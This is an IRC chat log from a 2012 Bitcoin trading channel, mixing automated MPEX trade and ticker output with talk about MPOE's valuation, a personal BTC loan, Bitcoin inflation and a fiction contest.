8640 @ 0.00050217 = 4.3387 BTC [+] Nov 11 19:49:40 [MPEX] [S.MPOE] 28200 @ 0.00050264 = 14.1744 BTC [+] Nov 11 20:03:25 http://trilema.com/2012/why-smpoe-is-worth-more-than-mtgox/ Nov 11 20:15:03 [MPEX] [S.MPOE] 8160 @ 0.00050286 = 4.1033 BTC [+] Nov 11 20:15:04 [MPEX] [S.MPOE] 15574 @ 0.00049857 = 7.7647 BTC [-] Nov 11 20:15:06 [MPEX] [S.MPOE] 166 @ 0.00049792 = 0.0827 BTC [-] Nov 11 20:18:40 i was block by a paid content filter Nov 11 20:18:44 blocked* Nov 11 20:19:00 aww. Nov 11 20:19:07 you get 5 free reads a week. Nov 11 20:19:46 hm Nov 11 20:20:01 i wonder how hard your protection is Nov 11 20:20:31 hehe. so try it. Nov 11 20:20:43 i will. Nov 11 20:21:03 i use http://tools.rosinstrument.com/cgi-proxy.htm to read trilema (with disabled JS ofc) Nov 11 20:22:15 did you pay the buck? Nov 11 20:22:39 no Nov 11 20:22:56 ;;rate jurov -1 scammed MP out of $1 Nov 11 20:22:58 Rating entry successful. Your rating of -1 for user jurov has been recorded. Nov 11 20:23:04 ok jk. Nov 11 20:23:06 omg Nov 11 20:23:07 ;;unrate jurov Nov 11 20:23:09 Successfully removed your rating for jurov. Nov 11 20:23:22 twas a fuckin joke. Nov 11 20:24:35 i'll pay someday... when i decide it's necessary to support poor romanian kids Nov 11 20:30:38 mircea, how many mpoe shares you actually sold? the IPO was only 1 promile, and that was twice I think Nov 11 20:31:35 now I guess it's 1-2% at most... then it's quite exaggeration to extrapolate mkt value from it Nov 11 20:34:51 lol Nov 11 20:35:18 Total shares : 1`000`000`000, of which : Nov 11 20:35:18 Mircea Popescu, 971`367`807 shares, Nov 11 20:35:18 Third parties 28`632`193 shares. Nov 11 20:35:21 from the last statement Nov 11 20:36:58 okay, so 2.8 % Nov 11 20:40:32 [MPEX] [S.MPOE] 10508 @ 0.0005069 = 5.3265 BTC [+] Nov 11 20:40:33 yeah,. Nov 11 20:40:37 on the other hand Nov 11 20:40:39 !ticker s.mpoe Nov 11 20:40:41 [MPEX:S.MPOE] 1day: 0.0004934 / 0.00050372 / 0.00051095 (2175547 shares, 1,095.87 BTC), 30day: 0.00030871 / 0.00044179 / 0.00051095 (75259427 shares, 33,249.38 BTC) Nov 11 20:40:49 ;;calc 28632193 * 0.00050372 Nov 11 20:40:51 14422.608258 Nov 11 20:41:03 why do you think 14k bitcoins aren't enough to extrapolate based on ? Nov 11 20:53:11 ;;calc 1000000000* 0.0005069 Nov 11 20:53:12 506900 Nov 11 20:56:54 mircea, it's too much uncertainty... and if all major btc companies extrapolated this way i suspect we'll ended with number several times beyond btc in circulation Nov 11 20:58:04 [MPEX] [S.MPOE] 1992 @ 0.00050181 = 0.9996 BTC [-] Nov 11 20:59:07 ;;calc 100000000*0.00181 Nov 11 20:59:08 181000 Nov 11 20:59:18 that's satoshidice, for example Nov 11 20:59:31 silk road would be much more, etc... Nov 11 21:00:37 im not sure it would be much more. Nov 11 21:00:49 shouldn't we be calcing the free float market cap (or as close as we can get to it) rather than implied value? Nov 11 21:00:50 but anyway : obviously the value of all items in btc will be more than the total btc. Nov 11 21:01:30 jurov but i think in a world where absolutely NO OTHER measure exists or is used, this measure, flawed as it may be, is much better. Nov 11 21:02:21 and, mircea_popescu, didn't you pledge to never release control of 50% the total shares during the initial offering? Nov 11 21:02:30 not what i heard for measuring trust mp Nov 11 21:02:40 smickles nobody on mpex can release more than 50% Nov 11 21:02:42 kakobrekla hm ? Nov 11 21:03:08 ah didnt you listen to katz Nov 11 21:03:24 i must have missed some katz. Nov 11 21:03:28 rockin' katz Nov 11 21:03:41 ;;lucky "rockin katz" Nov 11 21:03:42 http://hub.webring.org/hub/rockinkatz Nov 11 21:04:28 Giacomo Lucky Katz Casteldelmare Nov 11 21:04:32 sounds like a kickass mobster name Nov 11 21:04:33 nothing on bitcoinica yet eh? Nov 11 21:04:33 There were no results matching the query. Nov 11 21:04:34 Create the page "Katz" on this wiki! Nov 11 21:09:44 ;;bc,stats Nov 11 21:09:46 Current Blocks: 207520 | Current Difficulty: 3304356.3929903 | Next Difficulty At Block: 207647 | Next Difficulty In: 127 blocks | Next Difficulty In About: 20 hours, 10 minutes, and 44 seconds | Next Difficulty Estimate: 3392979.01731214 | Estimated Percent Change: 2.68199351952 Nov 11 21:10:40 impossibru. Nov 11 21:12:17 put my whole opinion there. Nov 11 21:12:25 * i've Nov 11 21:21:38 Azelphur: I just made pyMPEx better … again Nov 11 21:21:59 jurov: you use pympex too, don't you? Nov 11 21:22:01 whatcha do ? Nov 11 21:22:04 smickles: fun Nov 11 21:22:32 mircea_popescu: added signature verification Nov 11 21:22:43 pretty cool Nov 11 21:22:46 i thought it had it ? Nov 11 21:23:17 :D Nov 11 21:24:07 HOORAY FOR OPEN SOURCE :D Nov 11 21:24:21 [MPEX] [S.MPOE] 7850 @ 0.00050181 = 3.9392 BTC [-] Nov 11 21:25:10 indeed \o/ Nov 11 21:34:07 yes i use pympex Nov 11 21:36:50 it did not occur to me to check the signature :/ and it's true user's pubkey is used, so it's necessary Nov 11 21:36:57 thanks Nov 11 21:37:19 yay for open source #2. Nov 11 21:38:41 i didn't know you were a fan of OSS mircea_popescu Nov 11 21:39:19 smickles: UGH I think I'm not synched up to our timezones Nov 11 21:39:30 im a fan of some parts. Nov 11 21:40:23 unlike steve ballmer Nov 11 21:49:23 [MPEX] [S.MPOE] 800 @ 0.0005 = 0.4 BTC [-] Nov 11 21:49:24 [MPEX] [S.MPOE] 11846 @ 0.00049897 = 5.9108 BTC [-] Nov 11 21:49:26 [MPEX] [S.MPOE] 17954 @ 0.00049792 = 8.9397 BTC [-] Nov 11 21:53:44 why are a lot of the options n/a? Nov 11 21:54:01 no one is selling/buying them Nov 11 21:54:12 :( Nov 11 21:54:20 i haven't yet launched my bot Nov 11 21:55:55 the arbritrageur? Nov 11 21:58:58 thestringpuller bot got bought out. Nov 11 21:59:15 was an episode earlier like 30-40k contracts were bought Nov 11 22:02:44 jurov http://trilema.com/2012/why-smpoe-is-worth-more-than-mtgox/#comment-90390 Nov 11 22:06:26 they is gonna resell those contracts at sky high prices Nov 11 22:07:03 if it goes up, maybe yea Nov 11 22:07:21 were they all calls that were bought? Nov 11 22:07:22 does mpex need funding? Nov 11 22:10:34 Nov 11 22:11:16 Lyspooner: you lookin' to throw some btc at MPBOR? Nov 11 22:12:00 Apr 05 22:50:39 {Cusipzzz}i, for one, welcome our stable bitcoin overlords << lol, good line to end on Nov 11 22:12:04 i don't know. with mpoe loaded up short calls, i can't expect mircea to not mess around with mtgox on final settlement day Nov 11 22:12:25 or any day, for that matter Nov 11 22:13:43 haha i don't even have an acct. Nov 11 22:14:19 yeah, but you broker does /jk Nov 11 22:14:48 lol Nov 11 22:14:50 but seriously what sort of rate can i get for my coins from mpex? Nov 11 22:14:58 [MPEX] [S.MPOE] 16200 @ 0.00050181 = 8.1293 BTC [+] Nov 11 22:14:58 MPBOR was 9% last month Nov 11 22:15:04 jurov, do you take direct deposits Nov 11 22:15:07 25% and it's a deal Nov 11 22:15:16 haha well nothing stops you from trying. Nov 11 22:15:23 kakobrekla, you mean the loan? of course Nov 11 22:15:26 course, it'd all be for next month anyway. Nov 11 22:15:27 25% sounds reasonable considering the recent losses Nov 11 22:15:52 more than reasonable Nov 11 22:16:07 sounds risky at 25% Nov 11 22:16:10 jurov 15 days only? Nov 11 22:16:33 give me some sort of bitcoin friday 25% guarantee Nov 11 22:16:46 lol Nov 11 22:17:06 lol Nov 11 22:17:24 kakobrekla, you want longer term? Nov 11 22:17:32 or i'll just go buy a hat and some honey Nov 11 22:17:44 loan it to who was looking for Nov 11 22:17:46 i think jurov ? Nov 11 22:18:06 what's his story Nov 11 22:18:09 https://btcjam.com/listings/517 Nov 11 22:18:18 jurov if you need 100 btc i can lend it to you for a month Nov 11 22:18:43 for how much? 9% ? Nov 11 22:18:48 on btcjam, that %, is that the term % or a yearly %? Nov 11 22:18:56 term % Nov 11 22:18:57 smickles i was asking myself the same Nov 11 22:19:08 there's final amount shown too Nov 11 22:19:14 for anyone that still remembers april times tho... it was a really scary time to be in bitcoin. Nov 11 22:19:24 lots of people were expecting to see $1 Nov 11 22:19:59 BTC 100.00000 @ 2.9% is that per month ? Nov 11 22:20:05 2011 was a scary time to be in euro Nov 11 22:20:19 ;;calc 1.029 ** (365/15) Nov 11 22:20:19 2.00496803248 Nov 11 22:20:30 mircea, no , on 1st dec i am to repay 102.9 Nov 11 22:20:36 hm, 2.9 is per 14 days or 11 that is remaining Nov 11 22:20:47 see above Nov 11 22:20:53 a Nov 11 22:21:05 Lyspooner or dollars Nov 11 22:21:09 so its like 6 per month Nov 11 22:21:12 or something Nov 11 22:21:17 aha Nov 11 22:21:19 why did you offer 9 Nov 11 22:21:25 ill take 9 over 6 Nov 11 22:21:42 damn jurov was that stat b/f or after our thing? Nov 11 22:21:55 ;;calc 1.029 ** (15/365) Nov 11 22:21:55 1.00117551737 Nov 11 22:22:03 smickles noob. Nov 11 22:22:29 mircea_popescu: you so sure we were calcing the same thing? Nov 11 22:22:31 smikles, before. but i also have > 100k sell orders there and the collateral isn't counting them Nov 11 22:22:37 no :D Nov 11 22:23:38 sorry kakobrekla, you're right, i confused it woth the loan we did w/smickles. Nov 11 22:26:00 aha Nov 11 22:26:02 kakobrekla, if you can accept 6% / month I'll be glad Nov 11 22:26:25 well ... its not terribly attractive yet not something to pass along Nov 11 22:26:28 50 btc if you want Nov 11 22:26:31 post an addy Nov 11 22:26:53 1EXeDPMG5M5imDpaX5znAk3JFx36bVpWaT Nov 11 22:26:56 one sec Nov 11 22:28:49 sent Nov 11 22:28:54 so that means 53BTC due on 11 December 2012? Nov 11 22:29:04 thats fine Nov 11 22:29:14 good. thanks! Nov 11 22:29:20 yw Nov 11 22:31:59 kakobrekla, your addy, just in case? Nov 11 22:32:20 here it is 1GjVtbovA6Lr8UJgPKQNgzgtMwq4NDoYsR Nov 11 22:32:23 but if im dead Nov 11 22:32:34 you are better off keeping the money Nov 11 22:33:28 okay. and if fsa gets you,. i'll send it to them. Nov 11 22:33:43 :p Nov 11 22:41:01 [MPEX] [S.MPOE] 13936 @ 0.00049792 = 6.939 BTC [-] Nov 11 22:41:07 so, i just sold my 14yr old daewoo to lyspooner Nov 11 22:41:18 um that's not true Nov 11 22:41:20 for not bad a price :DDD Nov 11 22:41:23 you posted it as collateral Nov 11 22:41:50 secured loans by unsecure cars Nov 11 22:43:06 uhm, i was ging to fix slightly recessed roof tomorow... perhaps that can wait a month Nov 11 22:43:26 !? Nov 11 22:43:36 you srsly sold/bought a car ? Nov 11 22:43:41 and that noisy exhaust... too, prolly Nov 11 22:43:55 i'm just poking some fun to lyspooner Nov 11 22:43:59 lolk Nov 11 22:44:11 i don't drive cars anymore Nov 11 22:44:21 i drive jets Nov 11 22:44:45 one day you'll graduate do driving women. Nov 11 22:44:50 after that all that's left is herding cats. Nov 11 22:46:31 i'd like to drive a cat Nov 11 22:46:47 a jungle cat Nov 11 22:47:10 so why should you be worth more than mtgox? Nov 11 22:47:15 i didn't follow the numbers Nov 11 22:47:44 cause mircea is exponential Nov 11 22:47:51 oh ok Nov 11 22:49:56 from BFL apparently: ""We'll notify you at least a week before your order is ready and you can send your FPGA in. We are working on a way to cross ship you the device, so you don't have any downtime. It will probably involve you sending us BTC for the amount of the device and we'll refund the BTC when we get your FPGA unit back." Nov 11 22:50:34 cause mircea is exponential <<< lol phrase of the year. Nov 11 22:51:00 Lyspooner do you even have currency exchanges in your country ? as an independent business i mean Nov 11 22:51:42 currency exchanges exist in my country Nov 11 22:52:29 ok. do you see how one of them would compare to the stock exchange ? Nov 11 22:53:44 i could compare their earnings, yes Nov 11 22:54:25 srsly ?! Nov 11 22:54:58 um yes Nov 11 22:55:40 they have earnings in some sort of real number Nov 11 22:55:43 o lol Nov 11 22:55:57 no but i mean, exchange house makes x, stock exchange makes y Nov 11 22:55:58 x > y Nov 11 22:56:01 oh ok Nov 11 22:56:09 MPEx earnings: sqrt(-1) Nov 11 22:56:32 i Nov 11 22:56:33 but mtgox:currency exchange::mpex:stock exchange isn't a fair analogy Nov 11 22:57:34 indeed, because mpex also has the mpoe wing. Nov 11 22:57:38 ha Nov 11 22:57:41 ;) Nov 11 22:57:57 well if it is a fair analogy then it has been a fair analogy for the past two years Nov 11 22:57:58 and also because irl currency exchanges are in a much better relation to the respective govts Nov 11 22:58:03 than mtgox is or ever will be Nov 11 22:58:35 for instance, irl an exchanger is bled try in taxes and reg costs, but also protected, because you need a license to do it. Nov 11 22:58:38 mtgox merchant solutions is a nice component of their business Nov 11 22:58:39 in bitcoin, there's no license. Nov 11 22:59:00 i agree, they may diversify into other areas Nov 11 23:00:02 DRY DRY DRY Nov 11 23:00:13 ^a contradiction Nov 11 23:00:25 understand, it's not like i have a deathwish for mtgox or anything. they're doing something valuable and so on. Nov 11 23:00:29 ok, but for the same reasons there may be many stock exchanges to compete against mpex Nov 11 23:00:45 not really. you need a lot more credibility to make a mpex than to trade usd for btc or back Nov 11 23:01:01 is that why you have such great PR work on the forums Nov 11 23:01:02 and a lot more competence. Nov 11 23:01:14 haha what forums ? Nov 11 23:01:19 THE forum Nov 11 23:01:41 heh. Nov 11 23:01:49 tell you what,nefario had great pr on THE forum Nov 11 23:01:54 look how well that worked for him. Nov 11 23:02:03 nefario was incompetent Nov 11 23:02:14 and a coward Nov 11 23:02:31 and probably a snitch Nov 11 23:04:18 [MPEX] [S.MPOE] 26600 @ 0.0004989 = 13.2707 BTC [+] Nov 11 23:04:19 [MPEX] [S.MPOE] 2509 @ 0.00050181 = 1.259 BTC [+] Nov 11 23:04:21 [MPEX] [S.MPOE] 1650 @ 0.00050715 = 0.8368 BTC [+] Nov 11 23:04:22 [MPEX] [S.MPOE] 19241 @ 0.0005077 = 9.7687 BTC [+] Nov 11 23:05:19 43% of canadians would rather have bacon than sex Nov 11 23:05:23 any canadians here? Nov 11 23:06:21 what percentage would rather just have sex with bacon? Nov 11 23:06:38 hahaha Nov 11 23:07:15 thestringpuller: that is likely going to be 90% or more for 'mericans Nov 11 23:13:29 more useful is trading passwords for candy Nov 11 23:14:51 if btctalk enabled instant candy transfers, it would melt down Nov 11 23:15:48 sorta like candy. Nov 11 23:20:33 moosecock eh? Nov 11 23:20:56 [MPEX] [S.MPOE] 21471 @ 0.0005077 = 10.9008 BTC [+] Nov 11 23:20:57 [MPEX] [S.MPOE] 29529 @ 0.00050784 = 14.996 BTC [+] Nov 11 23:21:57 [MPEX] [S.MPOE] 13971 @ 0.00050784 = 7.095 BTC [+] Nov 11 23:21:59 [MPEX] [S.MPOE] 14120 @ 0.00050914 = 7.1891 BTC [+] Nov 11 23:22:00 [MPEX] [S.MPOE] 21900 @ 0.00050928 = 11.1532 BTC [+] Nov 11 23:22:01 [MPEX] [S.MPOE] 1009 @ 0.00050937 = 0.514 BTC [+] Nov 11 23:22:23 [MPEX] [S.MPOE] 17167 @ 0.00050937 = 8.7444 BTC [+] Nov 11 23:22:24 [MPEX] [S.MPOE] 23750 @ 0.00050938 = 12.0978 BTC [+] Nov 11 23:22:25 [MPEX] [S.MPOE] 34050 @ 0.00050962 = 17.3526 BTC [+] Nov 11 23:27:32 o hey Garr255 hows the ponzi doing Nov 11 23:28:53 lmao russians do call mining pool kolkhozy :D https://bitcointalk.org/index.php?topic=14044.0 Nov 11 23:29:22 the K.KBRL plot thickens Nov 11 23:33:17 hey kakobrekla, well its not a "ponzi" see the latest post: https://bitcointalk.org/index.php?topic=123654.msg1329823#msg1329823 Nov 11 23:33:40 but the game is going well, off to a bit of a slow start though Nov 11 23:36:11 i dont see how this could possibly end well Nov 11 23:37:30 kakobrekla, for some people it won't, for others it will. that's how these games work. Nov 11 23:37:52 definitely don't ever treat a game like this as an "investment" Nov 11 23:38:00 add "for you" at the end of first statement Nov 11 23:38:34 not gonna stand in the way just a word of warning Nov 11 23:38:54 Garr255, you can incorporate mpex bonds in the game.. for fun and profit Nov 11 23:39:29 "fun and profit" seems like something is missing in that phrase... aa i got it "fun, profit and milk" Nov 11 23:41:01 or at least satoshidice. or both Nov 11 23:42:39 That would be cool, but I think it'll be best to keep it as straight forward as possible. Nov 11 23:44:01 A glass of milk, straight. Nov 11 23:47:37 [MPEX] [S.MPOE] 44450 @ 0.00051 = 22.6695 BTC [+] Nov 11 23:54:47 BTC is always deflating... Nov 11 23:57:23 bitcoin friday was a failure it seems... Nov 12 00:06:31 How so? Nov 12 00:12:58 [MPEX] [S.MPOE] 12509 @ 0.00051058 = 6.3868 BTC [+] Nov 12 00:38:05 [MPEX] [S.MPOE] 40650 @ 0.00051 = 20.7315 BTC [-] Nov 12 00:45:18 BTC-Mining: 20:16 < Lyspooner> give me some sort of bitcoin friday 25% guarantee <<< that's how so ;) Nov 12 00:45:47 *note, lyspooner didn't get the 25% Nov 12 00:48:25 and I didn't get my discounted by 90% bitcoins for Bitcoin Friday. What a letdown, way to blow up my hopes. Nov 12 00:49:08 I shall thus call it a major failure to provide me Bitcoins en masse. Nov 12 01:03:27 [MPEX] [S.MPOE] 8946 @ 0.00051058 = 4.5676 BTC [+] Nov 12 01:03:29 [MPEX] [S.MPOE] 1269 @ 0.00051115 = 0.6486 BTC [+] Nov 12 01:28:30 [MPEX] [S.MPOE] 47954 @ 0.00051 = 24.4565 BTC [-] Nov 12 01:31:47 ohohoh this is juicy Nov 12 01:31:48 https://bitcointalk.org/index.php?topic=121915.msg1329998#msg1329998 Nov 12 01:32:12 so joel katz was actually trying to con rather than just being dumb as rocks ?! Nov 12 01:32:14 teh surprise. Nov 12 01:54:23 [MPEX] [S.MPOE] 34500 @ 0.00051 = 17.595 BTC [-] Nov 12 02:20:02 [MPEX] [S.MPOE] 27479 @ 0.00051 = 14.0143 BTC [-] Nov 12 02:46:00 [MPEX] [S.MPOE] 21621 @ 0.00050918 = 11.009 BTC [-] Nov 12 02:46:01 [MPEX] [S.MPOE] 10572 @ 0.00051007 = 5.3925 BTC [+] Nov 12 03:11:03 [MPEX] [S.MPOE] 22602 @ 0.00050886 = 11.5013 BTC [-] Nov 12 03:11:05 [MPEX] [S.MPOE] 4098 @ 0.00050662 = 2.0761 BTC [-] **** BEGIN LOGGING AT Mon Nov 12 12:41:07 2012 Nov 12 12:59:46 [MPEX] [S.MPOE] 23451 @ 0.00050428 = 11.8259 BTC [+] Nov 12 12:59:47 [MPEX] [S.MPOE] 6999 @ 0.00050665 = 3.546 BTC [+] Nov 12 13:07:59 Diablo-D3: keep dreaming :) Nov 12 13:09:41 well, you didnt Nov 12 13:25:29 [MPEX] [S.MPOE] 25027 @ 0.00050256 = 12.5776 BTC [-] Nov 12 13:25:31 [MPEX] [S.MPOE] 8273 @ 0.0005025 = 4.1572 BTC [-] Nov 12 13:40:14 http://trilema.com/2012/gpg-contracts/#comment-90403 << for shits and giggles. Nov 12 13:51:04 [MPEX] [S.MPOE] 11909 @ 0.00050665 = 6.0337 BTC [+] Nov 12 13:51:06 [MPEX] [S.MPOE] 4301 @ 0.00050913 = 2.1898 BTC [+] Nov 12 13:51:07 [MPEX] [S.MPOE] 1400 @ 0.00050964 = 0.7135 BTC [+] Nov 12 13:56:03 mornin Nov 12 13:56:19 afternoon Nov 12 13:56:52 o hey jurov Nov 12 13:56:57 mpoe pr is onto you https://bitcointalk.org/index.php?topic=123735.0 Nov 12 13:57:01 much worse than fsa! Nov 12 14:00:26 ,-at least it can be easily explained... it imported +7 -1 twice :/ Nov 12 14:00:54 heh Nov 12 14:00:58 ;;bc,stats Nov 12 14:01:01 Current Blocks: 207621 | Current Difficulty: 3304356.3929903 | Next Difficulty At Block: 207647 | Next Difficulty In: 26 blocks | Next Difficulty In About: 4 hours, 11 minutes, and 20 seconds | Next Difficulty Estimate: 3387470.00113994 | Estimated Percent Change: 2.5152737255 Nov 12 14:07:16 omfg. Nov 12 14:07:25 so you mean to tell me that if you imported it 1000 times you'd have 7000 ratings ? Nov 12 14:09:15 wait, what? Nov 12 14:16:35 [MPEX] [S.MPOE] 20900 @ 0.00051034 = 10.6661 BTC [+] Nov 12 14:42:29 [MPEX] [S.MPOE] 20591 @ 0.00051034 = 10.5084 BTC [+] Nov 12 14:52:42 your daily installment of my ramblings : http://trilema.com/2012/let-us-revisit-cleveland/ Nov 12 14:54:14 Blake is from Cleveland Nov 12 14:54:26 blake who Nov 12 14:54:31 William Blake Nov 12 14:54:56 well william blake is also dead. so was :p Nov 12 14:54:58 (ref: http://www.imdb.com/title/tt0112817/) Nov 12 14:55:06 yeah true that. Nov 12 14:55:36 brilliant move btw :p Nov 12 14:55:39 movie* Nov 12 14:56:06 johhny dep was such a good actor Nov 12 14:56:10 pity he went off the deep end Nov 12 14:56:30 he does a good job here Nov 12 14:57:37 mircea_popescu: he did? Nov 12 14:57:45 I always thought he swam back to the shallow end Nov 12 14:58:05 i love this part http://www.youtube.com/watch?v=pKVVkiMIkM0 Nov 12 14:58:08 hehe Nov 12 14:58:20 potc may be his most famous role now, but its sure as hell not a difficult role for him Nov 12 14:58:31 its basically, show up for work drunk, remain drunk, and then return home, still drunk Nov 12 14:59:06 maybe he did swim back, i dunno Nov 12 14:59:09 ... okay so, I just described the best job ever. goddamnit. Nov 12 14:59:21 lol. j. depp owns joo Nov 12 15:00:38 my god, what would happen if him and robert downey jr, like, made a movie together Nov 12 15:07:29 [MPEX] [S.MPOE] 10909 @ 0.00051034 = 5.5673 BTC [+] Nov 12 15:07:31 [MPEX] [S.MPOE] 2187 @ 0.00051015 = 1.1157 BTC [-] Nov 12 15:07:32 [MPEX] [S.MPOE] 26804 @ 0.00051 = 13.67 BTC [-] Nov 12 15:19:11 gay sex ? Nov 12 15:19:19 besides, i think they did. Nov 12 15:24:40 have you seen? http://i.imgur.com/4vXh1.png Nov 12 15:25:48 if i did phonesex, i'll be calling my clients "someone lose big at sdice, buy buy buy" :P Nov 12 15:26:38 o wow, 2k uhh Nov 12 15:31:21 BTC diff keeps crawling up and up but looks like there is no new money pouring in to push that price up Nov 12 15:32:14 went up like 5% today did it Nov 12 15:32:35 [MPEX] [S.MPOE] 21314 @ 0.00051 = 10.8701 BTC [-] Nov 12 15:32:56 so what's the story with payb.tc ? i saw some vague accusations of impropriety re pirate funds or what ? Nov 12 15:34:10 not yet Nov 12 15:34:12 ;;bc,stats Nov 12 15:34:14 Current Blocks: 207628 | Current Difficulty: 3304356.3929903 | Next Difficulty At Block: 207647 | Next Difficulty In: 19 blocks | Next Difficulty In About: 3 hours, 4 minutes, and 37 seconds | Next Difficulty Estimate: 3383862.79383115 | Estimated Percent Change: 2.40610852417 Nov 12 15:34:21 probably Nov 12 15:35:25 kakobrekla i meant price went up Nov 12 15:35:42 ah Nov 12 15:38:30 it did not go up at all today. Nov 12 15:39:17 ;;bc,24hprc Nov 12 15:39:18 10.87 Nov 12 15:39:18 correction, it did Nov 12 15:39:29 ;;ticker Nov 12 15:39:29 BTCUSD ticker | Best bid: 10.92779, Best ask: 11.00990, Bid-ask spread: 0.08211, Last trade: 10.92778, 24 hour volume: 33988.90687136, 24 hour low: 10.70000, 24 hour high: 11.10000, 24 hour vwap: 10.93106 Nov 12 15:39:37 it's a little bit up Nov 12 15:43:19 ppcoin looks good Nov 12 15:52:47 in case anyone was wondering where they come from, https://www.freelancer.com/projects/Copywriting-Data-Processing/Professional-Quality-Web-amp-Bitcoin.html Nov 12 15:53:05 India and Bangladesh Nov 12 15:58:03 [MPEX] [S.MPOE] 1882 @ 0.00051 = 0.9598 BTC [-] Nov 12 15:58:04 [MPEX] [S.MPOE] 9518 @ 0.00050668 = 4.8226 BTC [-] Nov 12 16:23:54 [MPEX] [S.MPOE] 7655 @ 0.00050668 = 3.8786 BTC [-] Nov 12 16:29:21 who mircea_popescu ? Nov 12 16:29:34 need more words. Nov 12 16:30:04 "mircea_popescu | in case anyone was wondering where they come from," ... who are they? context is missing Nov 12 16:30:55 they are the people making bs bitcoin services Nov 12 16:30:59 that have not a hope in the world. Nov 12 16:34:31 http://www.freelancer.com/search/bitcoin/ Nov 12 16:36:34 my favorite is the website like bitcoin that uses web browser. Nov 12 16:37:51 myeah Nov 12 16:39:55 "you know" was missing from the description so it's still unclear wtf he actually needs :) Nov 12 16:49:04 [MPEX] [S.MPOE] 7699 @ 0.00051003 = 3.9267 BTC [+] Nov 12 17:02:09 !ticker Nov 12 17:02:09 Provide ticker. Nov 12 17:02:43 you gotta tell the bot Nov 12 17:02:48 !ticker btc is now around 11 Nov 12 17:02:49 Invalid ticker. Nov 12 17:02:59 !ticker O.C110T Nov 12 17:03:00 Invalid ticker. Nov 12 17:03:21 !ticker O.C110USDT Nov 12 17:03:23 Invalid ticker. Nov 12 17:03:36 i dont think those come in the json Nov 12 17:14:33 [MPEX] [S.MPOE] 16270 @ 0.00051014 = 8.3 BTC [+] Nov 12 17:14:35 [MPEX] [S.MPOE] 16550 @ 0.00051092 = 8.4557 BTC [+] Nov 12 17:14:36 [MPEX] [S.MPOE] 22079 @ 0.00051115 = 11.2857 BTC [+] Nov 12 17:24:25 !ticker O.BTCUSDC110T Nov 12 17:24:26 Invalid ticker. Nov 12 17:24:36 duh Nov 12 17:24:41 !ticker O.BTCUSD.C110T Nov 12 17:24:43 [MPEX:O.BTCUSD.C110T] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.20397018 / 0.20474144 / 0.23775058 (6000 shares, 1,228.45 BTC) Nov 12 17:25:05 oh assbot you are so smart. Nov 12 17:39:50 [MPEX] [S.MPOE] 16896 @ 0.00051115 = 8.6364 BTC [+] Nov 12 17:39:52 [MPEX] [S.MPOE] 1354 @ 0.00051152 = 0.6926 BTC [+] Nov 12 18:05:02 [MPEX] [S.MPOE] 26751 @ 0.00051003 = 13.6438 BTC [-] Nov 12 18:05:04 [MPEX] [S.MPOE] 4649 @ 0.0005067 = 2.3556 BTC [-] Nov 12 18:27:29 jurov can we write call/put contracts from coinbr? Nov 12 18:30:31 [MPEX] [S.MPOE] 14557 @ 0.00051152 = 7.4462 BTC [+] Nov 12 18:37:36 thestringpuller, no. only buy/sell them. Nov 12 18:37:51 but i can do it manually for you Nov 12 18:40:14 i was gonna sell puts Nov 12 18:41:01 hey everyone : fiction contest. buncha prizes, 120 btc or so prize fund. Nov 12 18:41:02 http://trilema.com/2012/voluntary-contracts-after-a-while/ Nov 12 18:41:06 go sharpen your pens. Nov 12 18:43:23 thestringpuller, do you want to do something now? i'll be leaving for a hour or two Nov 12 18:47:06 talk tonight Nov 12 18:47:17 ok, later Nov 12 18:55:37 [MPEX] [S.MPOE] 3747 @ 0.00051152 = 1.9167 BTC [+] Nov 12 18:55:38 [MPEX] [S.MPOE] 12453 @ 0.00051155 = 6.3703 BTC [+] Nov 12 19:10:48 mircea_popescu: Interesting Nov 12 19:11:09 Would it be the first literary contest in bitcoinland? Nov 12 19:11:29 possibly so Nov 12 19:11:43 i used to do that a lot on trilema, but obviously for romanian. Nov 12 19:11:47 so now we try in English :) Nov 12 19:12:09 I may even work on something... Nov 12 19:12:33 well good luck to you then! Nov 12 19:12:41 the more entries the bigger the 5th prize anyway. Nov 12 19:12:59 Well, if I make something it will be the first time I'll try to write something directly in english... Nov 12 19:13:31 Let's see if something comes out... Nov 12 19:13:52 :D Nov 12 19:17:47 mircea_popescu: can it take place in a post apocalyptic world? Nov 12 19:19:00 sure Nov 12 19:19:20 what is due date? Nov 12 19:19:31 innit in the article ? Nov 12 19:20:13 also, someone be kind enough to put it on reddit/stumbleupon/facebook w/e Nov 12 19:20:52 [MPEX] [S.MPOE] 12900 @ 0.00051122 = 6.5947 BTC [-] Nov 12 19:28:51 the signal and the noise Nov 12 19:29:46 mircea_popescu: if bitcoin is always under deflationary pressure won't one make money eventually by holding onto the coins? Nov 12 19:29:59 how ? Nov 12 19:30:56 this year it is worth 10 next year it is 19 Nov 12 19:33:44 10 and 19 whats? Nov 12 19:33:58 any currentcy pairing Nov 12 19:34:19 that isnt experiencing agrressive inflation Nov 12 19:36:05 i guess i am asking wont over time, your coin will be worth more than when you acquired it Nov 12 19:43:01 "worth" Nov 12 19:43:11 in what sense ? in bitcoin your bitcoin will be worth just as much Nov 12 19:43:47 in another currency Nov 12 19:43:58 why is another currency relevant to you ? Nov 12 19:44:37 cause most people make sales in regards to its price in another currency Nov 12 19:45:57 [MPEX] [S.MPOE] 13793 @ 0.00051122 = 7.0513 BTC [-] Nov 12 19:45:58 [MPEX] [S.MPOE] 1133 @ 0.00050749 = 0.575 BTC [-] Nov 12 19:46:01 pff. Nov 12 19:46:16 are you even aware that in the past 10 years the dollar significantly appreciated in zimbabwe dollars ? Nov 12 19:46:24 what do you care about the zimbabwe dollar. makes no difference. Nov 12 19:47:33 i dont but other people so Nov 12 19:47:36 do* Nov 12 19:47:40 right. Nov 12 19:48:01 even you illustrated mpoe's equity in terms of usd Nov 12 19:48:57 thestringpuller: well, i was, but I was reading a book Nov 12 19:50:13 smickles tonight then mono-poly Nov 12 19:50:54 i did illustrate it in terms of usd, but mostly for the novelty value Nov 12 19:51:00 moreover, btc inflation is huge still. Nov 12 19:53:29 elaborate Nov 12 19:53:56 you're aware that every hour 300 new btc are minted on average Nov 12 19:54:09 ;;calc 300 * 24 * 365 / 10000000 Nov 12 19:54:09 0.2628 Nov 12 19:54:13 26% a year. Nov 12 19:55:41 but at somepoint that will stoo Nov 12 19:55:43 stop Nov 12 19:58:30 and at some point nobody will care about "other currencies" Nov 12 20:11:02 [MPEX] [S.MPOE] 10517 @ 0.00050749 = 5.3373 BTC [-] Nov 12 20:11:03 [MPEX] [S.MPOE] 18779 @ 0.00050693 = 9.5196 BTC 